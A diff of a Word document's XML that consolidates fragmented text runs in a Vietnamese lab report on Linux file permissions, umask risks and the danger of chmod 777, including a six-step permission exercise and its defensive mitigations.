-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>m</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Khi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tạo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hoặc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thư</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mục</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hệ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thống</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tự</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>động</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gán</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>một</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>bộ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>dựa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trên</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thông</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>số</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>umask</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nếu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cấu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>umask</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lỏng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lẻo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, file test.txt </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mới</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tạo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vô</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tình</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cấp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đọc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ghi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cho</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>những</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>người</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> dung </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>khác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>từ</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đó</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thực</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hiện</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chèn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> shellcode </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hoặc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>mã</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>độc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>…</w:t>
+        <w:t>- Có rủi ro bảo mật nào?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Khi tạo file hoặc thư mục, hệ thống tự động gán một bộ quyền dựa trên thông số umask. Nếu cấu hình umask lỏng lẻo, file test.txt mới tạo vô tình cấp quyền đọc/ghi cho những người dung khác từ đó thực hiện chèn shellcode hoặc mã độc…</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>N</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ậ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t thì c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">n </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ử</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lý</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>gì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thê</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Thiết</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lập</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đặc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tối</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thiểu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Giám</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sát</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tính</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>toàn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vẹn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>của</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tệp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Thiết lập đặc quyền tối thiểu</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+ Giám sát tính toàn vẹn của tệp</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1649,46 +312,16 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ụ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c tiêu:</w:t>
+        <w:t>Mục tiêu:</w:t>
       </w:r>
       <w:r>
         <w:br/>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u permission và risk chmod 777</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Các bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ự</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ệ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n:</w:t>
+        <w:t>Hiểu permission và risk chmod 777</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Các bước thực hiện:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1696,28 +329,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 1: T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">o file </w:t>
-      </w:r>
-      <w:r>
-        <w:t>ch</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ứ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>a credential</w:t>
+        <w:t>Bước 1: Tạo file chứa credential</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1730,19 +342,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 2: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra permission</w:t>
+        <w:t>Bước 2: Kiểm tra permission</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1755,19 +355,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 3: Set permission nguy hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m</w:t>
+        <w:t>Bước 3: Set permission nguy hiểm</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1780,25 +368,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 4: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ạ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Bước 4: Kiểm tra lại</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1811,13 +381,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 5: Fix permission</w:t>
+        <w:t>Bước 5: Fix permission</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1830,31 +394,7 @@
         <w:pStyle w:val="ListNumber"/>
       </w:pPr>
       <w:r>
-        <w:t>Bư</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ớ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>c 6: Ki</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>m tra l</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ầ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>n cu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ố</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Bước 6: Kiểm tra lần cuối</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1864,25 +404,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>K</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ế</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t qu</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ả</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mong đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ợ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i:</w:t>
+        <w:t>Kết quả mong đợi:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1890,22 +412,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>T</w:t>
-      </w:r>
-      <w:r>
-        <w:t>h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y permission thay đ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ổ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>i</w:t>
+        <w:t>Thấy permission thay đổi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1913,13 +420,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u rwx</w:t>
+        <w:t>Hiểu rwx</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1927,13 +428,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hi</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ể</w:t>
-      </w:r>
-      <w:r>
-        <w:t>u risk chmod 777</w:t>
+        <w:t>Hiểu risk chmod 777</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1943,846 +438,71 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Command </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nào</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tr</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ọ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nh</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ấ</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Chmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>là</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trọng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nhất</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vì</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nó</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>trực</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tiếp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>thay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đổi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>của</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tệp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tin. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Tiếp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>theo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ls –l </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xác</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> minh </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>xem</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>quyền</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đã</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>diễn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ra</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>đúng</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ý </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>chưa</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>- Command nào quan trọng nhất?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
